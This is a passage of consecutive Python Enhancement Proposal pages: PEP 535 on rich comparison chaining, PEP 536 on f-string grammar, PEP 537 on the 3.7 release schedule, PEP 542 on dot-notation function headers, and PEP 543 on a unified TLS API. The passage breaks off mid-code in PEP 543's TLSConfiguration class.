12-Nov-2016
Python-Version:
3.8
Table of Contents
PEP Deferral
Abstract
Relationship with other PEPs
Specification
Rationale
Implementation
References
Copyright
PEP Deferral
Further consideration of this PEP has been deferred until Python 3.8 at the
earliest.
Abstract
Inspired by PEP 335, and building on the circuit breaking protocol described
in PEP 532, this PEP proposes a change to the definition of chained comparisons,
where the comparison chaining will be updated to use the left-associative
circuit breaking operator (else) rather than the logical disjunction
operator (and) if the left hand comparison returns a circuit breaker as
its result.
While there are some practical complexities arising from the current handling
of single-valued arrays in NumPy, this change should be sufficient to allow
elementwise chained comparison operations for matrices, where the result
is a matrix of boolean values, rather than raising ValueError
or tautologically returning True (indicating a non-empty matrix).
Relationship with other PEPs
This PEP has been extracted from earlier iterations of PEP 532, as a
follow-on use case for the circuit breaking protocol, rather than an essential
part of its introduction.
The specific proposal in this PEP to handle the element-wise comparison use
case by changing the semantic definition of comparison chaining is drawn
directly from Guido’s rejection of PEP 335.
Specification
A chained comparison like 0 < x < 10 written as:
LEFT_BOUND LEFT_OP EXPR RIGHT_OP RIGHT_BOUND
is currently roughly semantically equivalent to:
_expr = EXPR
_lhs_result = LEFT_BOUND LEFT_OP _expr
_expr_result = _lhs_result and (_expr RIGHT_OP RIGHT_BOUND)
Using the circuit breaking concepts introduced in PEP 532, this PEP proposes
that comparison chaining be changed to explicitly check if the left comparison
returns a circuit breaker, and if so, use else rather than and to
implement the comparison chaining:
_expr = EXPR
_lhs_result = LEFT_BOUND LEFT_OP _expr
if hasattr(type(_lhs_result), "__else__"):
_expr_result = _lhs_result else (_expr RIGHT_OP RIGHT_BOUND)
else:
_expr_result = _lhs_result and (_expr RIGHT_OP RIGHT_BOUND)
This allows types like NumPy arrays to control the behaviour of chained
comparisons by returning suitably defined circuit breakers from comparison
operations.
The expansion of this logic to an arbitrary number of chained comparison
operations would be the same as the existing expansion for and.
Rationale
In ultimately rejecting PEP 335, Guido van Rossum noted [1]:
The NumPy folks brought up a somewhat separate issue: for them,
the most common use case is chained comparisons (e.g. A < B < C).
To understand this observation, we first need to look at how comparisons work
with NumPy arrays:
>>> import numpy as np
>>> increasing = np.arange(5)
>>> increasing
array([0, 1, 2, 3, 4])
>>> decreasing = np.arange(4, -1, -1)
>>> decreasing
array([4, 3, 2, 1, 0])
>>> increasing < decreasing
array([ True, True, False, False, False], dtype=bool)
Here we see that NumPy array comparisons are element-wise by default, comparing
each element in the left hand array to the corresponding element in the right
hand array, and producing a matrix of boolean results.
If either side of the comparison is a scalar value, then it is broadcast across
the array and compared to each individual element:
>>> 0 < increasing
array([False, True, True, True, True], dtype=bool)
>>> increasing < 4
array([ True, True, True, True, False], dtype=bool)
However, this broadcasting idiom breaks down if we attempt to use chained
comparisons:
>>> 0 < increasing < 4
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
The problem is that internally, Python implicitly expands this chained
comparison into the form:
>>> 0 < increasing and increasing < 4
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: The truth value of an array with more than one element is ambiguous. Use a.any() or a.all()
And NumPy only permits implicit coercion to a boolean value for single-element
arrays where a.any() and a.all() can be assured of having the same
result:
>>> np.array([False]) and np.array([False])
array([False], dtype=bool)
>>> np.array([False]) and np.array([True])
array([False], dtype=bool)
>>> np.array([True]) and np.array([False])
array([False], dtype=bool)
>>> np.array([True]) and np.array([True])
array([ True], dtype=bool)
The proposal in this PEP would allow this situation to be changed by updating
the definition of element-wise comparison operations in NumPy to return a
dedicated subclass that implements the new circuit breaking protocol and also
changes the result array’s interpretation in a boolean context to always
return False and hence never trigger the short-circuiting behaviour:
class ComparisonResultArray(np.ndarray):
def __bool__(self):
# Element-wise comparison chaining never short-circuits
return False
def _raise_NotImplementedError(self):
msg = ("Comparison array truth values are ambiguous outside "
"chained comparisons. Use a.any() or a.all()")
raise NotImplementedError(msg)
def __not__(self):
self._raise_NotImplementedError()
def __then__(self, result):
self._raise_NotImplementedError()
def __else__(self, result):
return np.logical_and(self, other.view(ComparisonResultArray))
With this change, the chained comparison example above would be able to return:
>>> 0 < increasing < 4
ComparisonResultArray([ False, True, True, True, False], dtype=bool)
Implementation
Actual implementation has been deferred pending in-principle interest in the
idea of making the changes proposed in PEP 532.
…TBD…
References
[1]
PEP 335 rejection notification
(https://mail.python.org/pipermail/python-dev/2012-March/117510.html)
Copyright
This document has been placed in the public domain under the terms of the
CC0 1.0 license: https://creativecommons.org/publicdomain/zero/1.0/
| Deferred | PEP 535 – Rich comparison chaining | Standards Track | Inspired by PEP 335, and building on the circuit breaking protocol described
in PEP 532, this PEP proposes a change to the definition of chained comparisons,
where the comparison chaining will be updated to use the left-associative
circuit breaking operator (else) rather than the logical disjunction
operator (and) if the left hand comparison returns a circuit breaker as
its result. |
PEP 536 – Final Grammar for Literal String Interpolation
Author:
Philipp Angerer <phil.angerer at gmail.com>
Status:
Withdrawn
Type:
Standards Track
Created:
11-Dec-2016
Python-Version:
3.7
Post-History:
18-Aug-2016,
23-Dec-2016,
15-Mar-2019
Resolution:
Discourse message
Table of Contents
Abstract
PEP Withdrawal
Terminology
Motivation
Rationale
Specification
Backwards Compatibility
Reference Implementation
References
Copyright
Abstract
PEP 498 introduced Literal String Interpolation (or “f-strings”).
The expression portions of those literals however are subject to
certain restrictions. This PEP proposes a formal grammar lifting
those restrictions, promoting “f-strings” to “f expressions” or f-literals.
This PEP expands upon the f-strings introduced by PEP 498,
so this text requires familiarity with PEP 498.
PEP Withdrawal
This PEP has been withdrawn in favour of PEP 701.
PEP 701 addresses all important points of this PEP.
Terminology
This text will refer to the existing grammar as “f-strings”,
and the proposed one as “f-literals”.
Furthermore, it will refer to the {}-delimited expressions in
f-literals/f-strings as “expression portions” and the static string content
around them as “string portions”.
Motivation
The current implementation of f-strings in CPython relies on the existing
string parsing machinery and a post processing of its tokens. This results in
several restrictions to the possible expressions usable within f-strings:
It is impossible to use the quote character delimiting the f-string
within the expression portion:>>> f'Magic wand: { bag['wand'] }'
^
SyntaxError: invalid syntax
A previously considered way around it would lead to escape sequences
in executed code and is prohibited in f-strings:>>> f'Magic wand { bag[\'wand\'] } string'
SyntaxError: f-string expression portion cannot include a backslash
Comments are forbidden even in multi-line f-strings:>>> f'''A complex trick: {
... bag['bag'] # recursive bags!
... }'''
SyntaxError: f-string expression part cannot include '#'
Expression portions need to wrap ':' and '!' in braces:>>> f'Useless use of lambdas: { lambda x: x*2 }'
SyntaxError: unexpected EOF while parsing
These limitations serve no purpose from a language user perspective and
can be lifted by giving f-literals a regular grammar without exceptions
and implementing it using dedicated parse code.
Rationale
The restrictions mentioned in Motivation are non-obvious and counter-intuitive
unless the user is familiar with the f-literals’ implementation details.
As mentioned, a previous version of PEP 498 allowed escape sequences
anywhere in f-strings, including as ways to encode the braces delimiting
the expression portions and in their code. They would be expanded before
the code is parsed, which would have had several important ramifications:
#. It would not be clear to human readers which portions are Expressions
and which are strings. Great material for an “obfuscated/underhanded
Python challenge”
#. Syntax highlighters are good in parsing nested grammar, but not
in recognizing escape sequences. ECMAScript 2016 (JavaScript) allows
escape sequences in its identifiers [1] and the author knows of no
syntax highlighter able to correctly highlight code making use of this.
As a consequence, the expression portions would be harder to recognize
with and without the aid of syntax highlighting. With the new grammar,
it is easy to extend syntax highlighters to correctly parse
and display f-literals:
f'Magic wand: {bag['wand']:^10}'Highlighting expression portions with possible escape sequences would
mean to create a modified copy of all rules of the complete expression
grammar, accounting for the possibility of escape sequences in key words,
delimiters, and all other language syntax. One such duplication would
yield one level of escaping depth and have to be repeated for a deeper
escaping in a recursive f-literal. This is the case since no highlighting
engine known to the author supports expanding escape sequences before
applying rules to a certain context. Nesting contexts however is a
standard feature of all highlighting engines.
Familiarity also plays a role: Arbitrary nesting of expressions
without expansion of escape sequences is available in every single
other language employing a string interpolation method that uses
expressions instead of just variable names. [2]
Specification
PEP 498 specified f-strings as the following, but places restrictions on it:
f ' <text> { <expression> <optional !s, !r, or !a> <optional : format specifier> } <text> ... '
All restrictions mentioned in the PEP are lifted from f-literals,
as explained below:
Expression portions may now contain strings delimited with the same
kind of quote that is used to delimit the f-literal.
Backslashes may now appear within expressions just like anywhere else
in Python code. In case of strings nested within f-literals,
escape sequences are expanded when the innermost string is evaluated.
Comments, using the '#' character, are possible only in multi-line
f-literals, since comments are terminated by the end of the line
(which makes closing a single-line f-literal impossible).
Expression portions may contain ':' or '!' wherever
syntactically valid. The first ':' or '!' that is not part
of an expression has to be followed a valid coercion or format specifier.
A remaining restriction not explicitly mentioned by PEP 498 is line breaks
in expression portions. Since strings delimited by single ' or "
characters are expected to be single line, line breaks remain illegal
in expression portions of single line strings.
Note
Is lifting of the restrictions sufficient,
or should we specify a more complete grammar?
Backwards Compatibility
f-literals are fully backwards compatible to f-strings,
and expands the syntax considered legal.
Reference Implementation
TBD
References
[1]
ECMAScript IdentifierName specification
( http://ecma-international.org/ecma-262/6.0/#sec-names-and-keywords )Yes, const cthulhu = { H̹̙̦̮͉̩̗̗ͧ̇̏̊̾Eͨ͆͒̆ͮ̃͏̷̮̣̫̤̣Cͯ̂͐͏̨̛͔̦̟͈̻O̜͎͍͙͚̬̝̣̽ͮ͐͗̀ͤ̍̀͢M̴̡̲̭͍͇̼̟̯̦̉̒͠Ḛ̛̙̞̪̗ͥͤͩ̾͑̔͐ͅṮ̴̷̷̗̼͍̿̿̓̽͐H̙̙̔̄͜\u0042: 42 } is valid ECMAScript 2016
[2]
Wikipedia article on string interpolation
( https://en.wikipedia.org/wiki/String_interpolation )
Copyright
This document has been placed in the public domain.
| Withdrawn | PEP 536 – Final Grammar for Literal String Interpolation | Standards Track | PEP 498 introduced Literal String Interpolation (or “f-strings”).
The expression portions of those literals however are subject to
certain restrictions. This PEP proposes a formal grammar lifting
those restrictions, promoting “f-strings” to “f expressions” or f-literals. |
PEP 537 – Python 3.7 Release Schedule
Author:
Ned Deily <nad at python.org>
Status:
Final
Type:
Informational
Topic:
Release
Created:
23-Dec-2016
Python-Version:
3.7
Table of Contents
Abstract
Release Manager and Crew
3.7 Lifespan
Release Schedule
3.7.0 schedule
3.7.1 schedule (first bugfix release)
3.7.2 schedule
3.7.3 schedule
3.7.4 schedule
3.7.5 schedule
3.7.6 schedule
3.7.7 schedule
3.7.8 schedule (last bugfix release)
3.7.9 schedule (security/binary release)
3.7.10 schedule
3.7.11 schedule
3.7.12 schedule
3.7.13 schedule
3.7.14 schedule
3.7.15 schedule
3.7.16 schedule
3.7.17 schedule (last security-only release)
Features for 3.7
Copyright
Abstract
This document describes the development and release schedule for
Python 3.7. The schedule primarily concerns itself with PEP-sized
items.
Release Manager and Crew
3.7 Release Manager: Ned Deily
Windows installers: Steve Dower
Mac installers: Ned Deily
Documentation: Julien Palard
3.7 Lifespan
3.7 will receive bugfix updates
approximately every 3 months for about 24 months. Sometime after the release of
3.8.0 final, a final 3.7 bugfix update will be released.
After that, it is expected that
security updates
(source only) will be released as needed until 5 years after
the release of 3.7 final, so until approximately 2023-06.
As of 2023-06-27, 3.7 has reached the
end-of-life phase
of its release cycle. 3.7.17 was the final security release. The code base for
3.7 is now frozen and no further updates will be provided nor issues of any
kind will be accepted on the bug tracker.
Release Schedule
3.7.0 schedule
3.7 development begins: 2016-09-12
3.7.0 alpha 1: 2017-09-19
3.7.0 alpha 2: 2017-10-17
3.7.0 alpha 3: 2017-12-05
3.7.0 alpha 4: 2018-01-09
3.7.0 beta 1: 2018-01-31
(No new features beyond this point.)
3.7.0 beta 2: 2018-02-27
3.7.0 beta 3: 2018-03-29
3.7.0 beta 4: 2018-05-02
3.7.0 beta 5: 2018-05-30
3.7.0 candidate 1: 2018-06-12
3.7.0 final: 2018-06-27
3.7.1 schedule (first bugfix release)
3.7.1 candidate 1: 2018-09-26
3.7.1 candidate 2: 2018-10-13
3.7.1 final: 2018-10-20
3.7.2 schedule
3.7.2 candidate 1: 2018-12-11
3.7.2 final: 2018-12-24
3.7.3 schedule
3.7.3 candidate 1: 2019-03-12
3.7.3 final: 2019-03-25
3.7.4 schedule
3.7.4 candidate 1: 2019-06-18
3.7.4 candidate 2: 2019-07-02
3.7.4 final: 2019-07-08
3.7.5 schedule
3.7.5 candidate 1: 2019-10-02
3.7.5 final: 2019-10-15
3.7.6 schedule
3.7.6 candidate 1: 2019-12-11
3.7.6 final: 2019-12-18
3.7.7 schedule
3.7.7 candidate 1: 2020-03-04
3.7.7 final: 2020-03-10
3.7.8 schedule (last bugfix release)
Last planned release of binaries
3.7.8 candidate 1: 2020-06-15
3.7.8 final: 2020-06-27
3.7.9 schedule (security/binary release)
Security fixes plus updated binary installers
to address 3.7.8 issues; no further binary
releases are planned.
3.7.9 final: 2020-08-17
3.7.10 schedule
3.7.10 final: 2021-02-15
3.7.11 schedule
3.7.11 final: 2021-06-28
3.7.12 schedule
3.7.12 final: 2021-09-04
3.7.13 schedule
3.7.13 final: 2022-03-16
3.7.14 schedule
3.7.14 final: 2022-09-06
3.7.15 schedule
3.7.15 final: 2022-10-11
3.7.16 schedule
3.7.16 final: 2022-12-06
3.7.17 schedule (last security-only release)
3.7.17 final: 2023-06-06
Features for 3.7
Implemented PEPs for 3.7 (as of 3.7.0 beta 1):
PEP 538, Coercing the legacy C locale to a UTF-8 based locale
PEP 539, A New C-API for Thread-Local Storage in CPython
PEP 540, UTF-8 mode
PEP 552, Deterministic pyc
PEP 553, Built-in breakpoint()
PEP 557, Data Classes
PEP 560, Core support for typing module and generic types
PEP 562, Module __getattr__ and __dir__
PEP 563, Postponed Evaluation of Annotations
PEP 564, Time functions with nanosecond resolution
PEP 565, Show DeprecationWarning in __main__
PEP 567, Context Variables
Copyright
This document has been placed in the public domain.
| Final | PEP 537 – Python 3.7 Release Schedule | Informational | This document describes the development and release schedule for
Python 3.7. The schedule primarily concerns itself with PEP-sized
items. |
PEP 542 – Dot Notation Assignment In Function Header
Author:
Markus Meskanen <markusmeskanen at gmail.com>
Status:
Rejected
Type:
Standards Track
Created:
10-Feb-2017
Resolution:
Python-Dev message
Table of Contents
Abstract
Rationale
Implementation
Backwards Compatibility
Copyright
Abstract
Function definitions only allow simple function names to be used,
even though functions are assignable first class objects.
This PEP proposes adding support for assigning a function to
a class or instance attribute directly in the function
definition’s header by using the dot notation to separate
the object from the function’s name.
Although a similar feature, this PEP does not address general
assignment to anything that supports assignment, such as dict keys
and list indexes.
Rationale
Currently if a function needs to be assigned to a class or instance
attribute, it requires an additional assignment statement to be made:
class MyClass:
...
my_instance = MyClass()
def my_function(self):
...
# Assign to class attribute
MyClass.my_function = my_function
# Or assign to instance attribute
my_instance.my_function = my_function
While this isn’t usually an inconvenience, using dot notation to
assign directly in the function’s header would greatly simplify this:
class MyClass:
...
my_instance = MyClass()
# Assign to class attribute
def MyClass.my_function(self):
...
# Or assign to instance attribute
def my_instance.my_function(self):
...
There are multiple reasons to use this functionality over
a standard class method, for example when the class is referenced
inside the function’s header (such as with decorators and typing).
This is also useful when an instance requires a callback attribute:
class Menu:
def __init__(self, items=None, select_callback=None):
self.items = items if items is not None else []
self.select_callback = select_callback
my_menu = Menu([item1, item2])
def my_menu.select_callback(item_index, menu):
print(menu.items[item_index])
As opposed to:
my_menu = Menu([item1, item2])
def select_callback(item_index, menu):
print(menu.items[item_index])
my_menu.select_callback = select_callback
Or defining them in an “unnatural” order:
def select_callback(item_index, menu):
print(menu.items[item_index])
my_menu = Menu([item1, item2], select_callback)
It reads better than the “unnatural” way, since you already know at
the time of the function definition what it’s goig to be used for.
It also saves one line of code while removing visual complexity.
The feature would also avoid leaving the function’s name into
the global namespace:
eggs = 'something'
def Spam.eggs(self):
...
def Cheese.eggs(self):
...
assert eggs == 'something'
Ideally this would be just syntastic sugar:
def x.y():
...
# Equals to
def y():
...
x.y = y
Similar to how decorators are syntastic sugar:
@decorate
def f():
...
# Equals to
def f():
...
f = decorate(f)
Implementation
The __name__ would follow the principles of a normal function:
class MyClass:
def my_function1(self):
...
def MyClass.my_function2(self):
...
assert my_function1.__name__ == 'my_function1'
assert my_function2.__name__ == 'my_function2'
The grammar would use dotted_name to support chaining of attributes:
def Person.name.fset(self, value):
self._name = value
Backwards Compatibility
This PEP is fully backwards compatible.
Copyright
This document has been placed in the public domain.
| Rejected | PEP 542 – Dot Notation Assignment In Function Header | Standards Track | Function definitions only allow simple function names to be used,
even though functions are assignable first class objects. |
PEP 543 – A Unified TLS API for Python
Author:
Cory Benfield <cory at lukasa.co.uk>,
Christian Heimes <christian at python.org>
Status:
Withdrawn
Type:
Standards Track
Created:
17-Oct-2016
Python-Version:
3.7
Post-History:
11-Jan-2017, 19-Jan-2017, 02-Feb-2017, 09-Feb-2017
Table of Contents
Abstract
Resolution
Rationale
Problems
Proposal
Interfaces
Configuration
Context
Buffer
Socket
Cipher Suites
OpenSSL
SecureTransport
SChannel
Network Security Services (NSS)
Proposed Interface
Protocol Negotiation
TLS Versions
Errors
Certificates
Private Keys
Trust Store
Runtime Access
Changes to the Standard Library
Migration of the ssl module
Future
Credits
Copyright
Abstract
This PEP would define a standard TLS interface in the form of a collection of
abstract base classes. This interface would allow Python implementations and
third-party libraries to provide bindings to TLS libraries other than OpenSSL
that can be used by tools that expect the interface provided by the Python
standard library, with the goal of reducing the dependence of the Python
ecosystem on OpenSSL.
Resolution
2020-06-25: With contemporary agreement with one author, and past
agreement with another, this PEP is withdrawn due to changes in the
APIs of the underlying operating systems.
Rationale
In the 21st century it has become increasingly clear that robust and
user-friendly TLS support is an extremely important part of the ecosystem of
any popular programming language. For most of its lifetime, this role in the
Python ecosystem has primarily been served by the ssl module, which provides
a Python API to the OpenSSL library.
Because the ssl module is distributed with the Python standard library, it
has become the overwhelmingly most-popular method for handling TLS in Python.
An extraordinary majority of Python libraries, both in the standard library and
on the Python Package Index, rely on the ssl module for their TLS
connectivity.
Unfortunately, the preeminence of the ssl module has had a number of
unforeseen side-effects that have had the effect of tying the entire Python
ecosystem tightly to OpenSSL. This has forced Python users to use OpenSSL even
in situations where it may provide a worse user experience than alternative TLS
implementations, which imposes a cognitive burden and makes it hard to provide
“platform-native” experiences.
Problems
The fact that the ssl module is built into the standard library has meant
that all standard-library Python networking libraries are entirely reliant on
the OpenSSL that the Python implementation has been linked against. This
leads to the following issues:
It is difficult to take advantage of new, higher-security TLS without
recompiling Python to get a new OpenSSL. While there are third-party bindings
to OpenSSL (e.g. pyOpenSSL), these need to be shimmed into a format that
the standard library understands, forcing projects that want to use them to
maintain substantial compatibility layers.
For Windows distributions of Python, they need to be shipped with a copy of
OpenSSL. This puts the CPython development team in the position of being
OpenSSL redistributors, potentially needing to ship security updates to the
Windows Python distributions when OpenSSL vulnerabilities are released.
For macOS distributions of Python, they need either to be shipped with a copy
of OpenSSL or linked against the system OpenSSL library. Apple has formally
deprecated linking against the system OpenSSL library, and even if they had
not, that library version has been unsupported by upstream for nearly one
year as of the time of writing. The CPython development team has started
shipping newer OpenSSLs with the Python available from python.org, but this
has the same problem as with Windows.
Many systems, including but not limited to Windows and macOS, do not make
their system certificate stores available to OpenSSL. This forces users to
either obtain their trust roots from elsewhere (e.g. certifi) or to
attempt to export their system trust stores in some form.Relying on certifi is less than ideal, as most system administrators do
not expect to receive security-critical software updates from PyPI.
Additionally, it is not easy to extend the certifi trust bundle to include
custom roots, or to centrally manage trust using the certifi model.
Even in situations where the system certificate stores are made available to
OpenSSL in some form, the experience is still sub-standard, as OpenSSL will
perform different validation checks than the platform-native TLS
implementation. This can lead to users experiencing different behaviour on
their browsers or other platform-native tools than they experience in Python,
with little or no recourse to resolve the problem.
Users may wish to integrate with TLS libraries other than OpenSSL for many
other reasons, such as OpenSSL missing features (e.g. TLS 1.3 support), or
because OpenSSL is simply too large and unwieldy for the platform (e.g. for
embedded Python). Those users are left with the requirement to use
third-party networking libraries that can interact with their preferred TLS
library or to shim their preferred library into the OpenSSL-specific ssl
module API.
Additionally, the ssl module as implemented today limits the ability of
CPython itself to add support for alternative TLS backends, or remove OpenSSL
support entirely, should either of these become necessary or useful. The
ssl module exposes too many OpenSSL-specific function calls and features to
easily map to an alternative TLS backend.
Proposal
This PEP proposes to introduce a few new Abstract Base Classes in Python 3.7 to
provide TLS functionality that is not so strongly tied to OpenSSL. It also
proposes to update standard library modules to use only the interface exposed
by these abstract base classes wherever possible. There are three goals here:
To provide a common API surface for both core and third-party developers to
target their TLS implementations to. This allows TLS developers to provide
interfaces that can be used by most Python code, and allows network
developers to have an interface that they can target that will work with a
wide range of TLS implementations.
To provide an API that has few or no OpenSSL-specific concepts leak through.
The ssl module today has a number of warts caused by leaking OpenSSL
concepts through to the API: the new ABCs would remove those specific
concepts.
To provide a path for the core development team to make OpenSSL one of many
possible TLS backends, rather than requiring that it be present on a system
in order for Python to have TLS support.
The proposed interface is laid out below.
Interfaces
There are several interfaces that require standardisation. Those interfaces
are:
Configuring TLS, currently implemented by the SSLContext class in the
ssl module.
Providing an in-memory buffer for doing in-memory encryption or decryption
with no actual I/O (necessary for asynchronous I/O models), currently
implemented by the SSLObject class in the ssl module.
Wrapping a socket object, currently implemented by the SSLSocket class
in the ssl module.
Applying TLS configuration to the wrapping objects in (2) and (3). Currently
this is also implemented by the SSLContext class in the ssl module.
Specifying TLS cipher suites. There is currently no code for doing this in
the standard library: instead, the standard library uses OpenSSL cipher
suite strings.
Specifying application-layer protocols that can be negotiated during the
TLS handshake.
Specifying TLS versions.
Reporting errors to the caller, currently implemented by the SSLError
class in the ssl module.
Specifying certificates to load, either as client or server certificates.
Specifying which trust database should be used to validate certificates
presented by a remote peer.
Finding a way to get hold of these interfaces at run time.
For the sake of simplicity, this PEP proposes to take a unified approach to
(2) and (3) (that is, buffers and sockets). The Python socket API is a
sizeable one, and implementing a wrapped socket that has the same behaviour as
a regular Python socket is a subtle and tricky thing to do. However, it is
entirely possible to implement a generic wrapped socket in terms of wrapped
buffers: that is, it is possible to write a wrapped socket (3) that will work
for any implementation that provides (2). For this reason, this PEP proposes to
provide an ABC for wrapped buffers (2) but a concrete class for wrapped sockets
(3).
This decision has the effect of making it impossible to bind a small number of
TLS libraries to this ABC, because those TLS libraries cannot provide a
wrapped buffer implementation. The most notable of these at this time appears
to be Amazon’s s2n, which currently does not provide an I/O abstraction
layer. However, even this library consider this a missing feature and are
working to add it. For this reason, it is safe to assume that a concrete
implementation of (3) in terms of (2) will be a substantial effort-saving
device and a great tool for correctness. Therefore, this PEP proposes doing
just that.
Obviously, (5) doesn’t require an abstract base class: instead, it requires a
richer API for configuring supported cipher suites that can be easily updated
with supported cipher suites for different implementations.
(9) is a thorny problem, because in an ideal world the private keys associated
with these certificates would never end up in-memory in the Python process
(that is, the TLS library would collaborate with a Hardware Security Module
(HSM) to provide the private key in such a way that it cannot be extracted from
process memory). Thus, we need to provide an extensible model of providing
certificates that allows concrete implementations the ability to provide this
higher level of security, while also allowing a lower bar for those
implementations that cannot. This lower bar would be the same as the status
quo: that is, the certificate may be loaded from an in-memory buffer or from a
file on disk.
(10) also represents an issue because different TLS implementations vary wildly
in how they allow users to select trust stores. Some implementations have
specific trust store formats that only they can use (such as the OpenSSL CA
directory format that is created by c_rehash), and others may not allow you
to specify a trust store that does not include their default trust store.
For this reason, we need to provide a model that assumes very little about the
form that trust stores take. The “Trust Store” section below goes into more
detail about how this is achieved.
Finally, this API will split the responsibilities currently assumed by the
SSLContext object: specifically, the responsibility for holding and managing
configuration and the responsibility for using that configuration to build
wrapper objects.
This is necessarily primarily for supporting functionality like Server Name
Indication (SNI). In OpenSSL (and thus in the ssl module), the server has
the ability to modify the TLS configuration in response to the client telling
the server what hostname it is trying to reach. This is mostly used to change
certificate chain so as to present the correct TLS certificate chain for the
given hostname. The specific mechanism by which this is done is by returning
a new SSLContext object with the appropriate configuration.
This is not a model that maps well to other TLS implementations. Instead, we
need to make it possible to provide a return value from the SNI callback that
can be used to indicate what configuration changes should be made. This means
providing an object that can hold TLS configuration. This object needs to be
applied to specific TLSWrappedBuffer, and TLSWrappedSocket objects.
For this reason, we split the responsibility of SSLContext into two separate
objects. The TLSConfiguration object is an object that acts as container
for TLS configuration: the ClientContext and ServerContext objects are
objects that are instantiated with a TLSConfiguration object. All three
objects would be immutable.
Note
The following API declarations uniformly use type hints to aid
reading. Some of these type hints cannot actually be used in practice
because they are circularly referential. Consider them more a
guideline than a reflection of the final code in the module.
Configuration
The TLSConfiguration concrete class defines an object that can hold and
manage TLS configuration. The goals of this class are as follows:
To provide a method of specifying TLS configuration that avoids the risk of
errors in typing (this excludes the use of a simple dictionary).
To provide an object that can be safely compared to other configuration
objects to detect changes in TLS configuration, for use with the SNI
callback.
This class is not an ABC, primarily because it is not expected to have
implementation-specific behaviour. The responsibility for transforming a
TLSConfiguration object into a useful set of configuration for a given TLS
implementation belongs to the Context objects discussed below.
This class has one other notable property: it is immutable. This is a desirable
trait for a few reasons. The most important one is that it allows these objects
to be used as dictionary keys, which is potentially extremely valuable for
certain TLS backends and their SNI configuration. On top of this, it frees
implementations from needing to worry about their configuration objects being
changed under their feet, which allows them to avoid needing to carefully
synchronize changes between their concrete data structures and the
configuration object.
This object is extendable: that is, future releases of Python may add
configuration fields to this object as they become useful. For
backwards-compatibility purposes, new fields are only appended to this object.
Existing fields will never be removed, renamed, or reordered.
The TLSConfiguration object would be defined by the following code:
ServerNameCallback = Callable[[TLSBufferObject, Optional[str], TLSConfiguration], Any]
_configuration_fields = [
'validate_certificates',
'certificate_chain',
'ciphers',
'inner_protocols',
'lowest_supported_version',
'highest_supported_version',
'trust_store',
'sni_callback',
]
_DEFAULT_VALUE = object()
class TLSConfiguration(namedtuple('TLSConfiguration', _configuration_fields)):
"""
An immutable TLS Configuration object. This object has the following
properties:
:param validate_certificates bool: Whether to validate the TLS
certificates. This switch operates at a very broad scope: either
validation is enabled, in which case all forms of validation are
performed including hostname validation if possible, or validation
is disabled, in which case no validation is performed.
Not all backends support having their certificate validation
disabled. If a backend does not support having their certificate
validation disabled, attempting to set this property to ``False``
will throw a ``TLSError`` when this object is passed into a
context object.
:param certificate_chain Tuple[Tuple[Certificate],PrivateKey]: The
certificate, intermediate certificate, and the corresponding
private key for the leaf certificate. These certificates will be
offered to the remote peer during the handshake if required.
The first Certificate in the list must be the leaf certificate. All
subsequent certificates will be offered as intermediate additional
certificates.
:param ciphers Tuple[Union[CipherSuite, int]]:
The available ciphers for TLS connections created with this
configuration, in priority order.
:param inner_protocols Tuple[Union[NextProtocol, bytes]]:
Protocols that connections created with this configuration should
advertise as supported during the TLS handshake. These may be
advertised using either or both of ALPN or NPN. This list of
protocols should be ordered by preference.
:param lowest_supported_version TLSVersion:
The minimum version of TLS that should be allowed on TLS
connections using this configuration.
:param highest_supported_version TLSVersion:
The maximum version of TLS that should be allowed on TLS
connections using this configuration.
:param trust_store TrustStore:
The trust store that connections using this configuration will use
to validate certificates.
:param sni_callback Optional[ServerNameCallback]:
A callback function that will be called after the TLS Client Hello
handshake message has been received by the TLS server when the TLS
client specifies a server name indication.
Only one callback can be set per ``TLSConfiguration``. If the
``sni_callback`` is ``None`` then the callback is disabled. If the
``TLSConfiguration`` is used for a ``ClientContext`` then this
setting will be ignored.
The ``callback`` function will be called with three arguments: the
first will be the ``TLSBufferObject`` for the connection; the
second will be a string that represents the server name that the
client is intending to communicate (or ``None`` if the TLS Client
Hello does not contain a server name); and the third argument will
be the original ``TLSConfiguration`` that configured the
connection. The server name argument will be the IDNA *decoded*
server name.
The ``callback`` must return a ``TLSConfiguration`` to allow
negotiation to continue. Other return values signal errors.
Attempting to control what error is signaled by the underlying TLS
implementation is not specified in this API, but is up to the
concrete implementation to handle.
The Context will do its best to apply the ``TLSConfiguration``
changes from its original configuration to the incoming connection.
This will usually include changing the certificate chain, but may
also include changes to allowable ciphers or any other
configuration settings.
"""
__slots__ = ()
def __new__(cls, validate_certificates: Optional[bool] = None,
certificate_chain: Optional[Tuple[Tuple[Certificate], PrivateKey]] = None,
ciphers: Optional[Tuple[Union[CipherSuite, int]]] = None,
inner_protocols: Optional[Tuple[Union[NextProtocol, bytes]]] = None,
lowest_supported_version: Optional[TLSVersion] = None,
highest_supported_version: Optional[TLSVersion] = None,
trust_store: Optional[TrustStore] = None,
sni_callback: Optional[ServerNameCallback] = None):
if validate_certificates is None:
validate_certificates = True
if ciphers is None:
ciphers = DEFAULT_CIPHER_LIST
if inner_protocols is None:
inner_protocols = []
if lowest_supported_version is None:
lowest_supported_version = TLSVersion.TLSv1
if highest_supported_version is None:
highest_supported_version = TLSVersion.MAXIMUM_SUPPORTED
return super().__new__(
cls, validate_certificates, certificate_chain, ciphers,
inner_protocols, lowest_supported_version,
highest_supported_version, trust_store, sni_callback
)
def update(self, validate_certificates=_DEFAULT_VALUE,
certificate_chain=_DEFAULT_VALUE,
ciphers=_DEFAULT_VALUE,
inner_protocols=_DEFAULT_VALUE,
lowest_supported_version=_DEFAULT_VALUE,
highest_supported_version=_DEFAULT_VALUE,
trust_store=_DEFAULT_VALUE,
sni_callback=_DEFAULT_VALUE):
"""
Create a new ``TLSConfiguration``, overriding some of the settings
on the original configuration with the new settings.
"""
if validate_certificates is _DEFAULT_VALUE:
validate_certificates = self.validate_certificates
if certificate_chain is _DEFAULT_VALUE:
certificate_chain = self.certificate_chain
if ciphers is _DEFAULT_VALUE:
ciphers = self.ciphers
if inner_protocols is _DEFAULT_VALUE:
inner_protocols = self.inner_protocols
if lowest_supported_version is _DEFAULT_VALUE:
lowest_supported_version = self.lowest_supported_version
if highest_supported_version is _DEFAULT_VALUE:
highest_supported_version = self.highest_supported_version
if trust_store is _DEFAULT_VALUE:
trust_store = self.trust_store
if sni_callback is _DEFAULT_VALUE:
sni_callback = self.sni_callback
return self.__class__(
